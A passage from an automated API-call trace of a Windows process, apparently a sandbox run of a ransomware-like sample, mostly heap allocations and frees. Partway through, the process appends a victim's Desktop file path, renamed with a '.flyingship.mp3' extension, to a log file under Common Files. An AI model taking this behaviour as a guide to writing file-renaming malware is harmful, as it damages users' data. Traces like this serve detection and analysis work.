returned 1 [0161.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0161.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0161.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0161.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0161.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0161.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0161.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0161.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0161.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0161.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0161.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0161.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0161.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.083] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0161.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0161.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0161.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0161.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0161.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0161.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0161.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.084] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0161.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0161.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0161.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0161.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0161.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0161.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0161.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0161.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0161.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0161.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0161.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0161.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0161.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0161.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x120) returned 0x8fff00 [0161.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0161.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0161.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0161.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0161.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0161.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0161.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9c5180 [0161.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.087] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0161.087] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.087] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0161.087] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.087] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0161.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0161.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.088] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0161.088] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x5ba, lpOverlapped=0x0) returned 1 [0161.089] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0161.089] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x5ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.089] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0161.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0161.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0161.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.flyingship.mp3\r\n", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0161.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4c) returned 0x923b28 [0161.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.flyingship.mp3\r\n", cchWideChar=76, lpMultiByteStr=0x923b28, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.flyingship.mp3\r\n", lpUsedDefaultChar=0x0) returned 76 [0161.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0161.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0161.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0161.089] WriteFile (in: hFile=0x138, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x4b, lpOverlapped=0x0) returned 1 [0161.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0161.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.090] CloseHandle (hObject=0x138) returned 1 [0161.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0161.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0161.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0161.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0161.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0161.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0161.092] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0161.092] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0161.093] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0161.093] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.093] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0161.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0161.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0161.093] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0161.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0161.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0161.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0161.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0161.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0161.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0161.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0161.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0161.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0161.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0161.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0161.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0161.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0161.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0161.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0161.095] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0161.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0161.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.095] RtlAllocateHeap 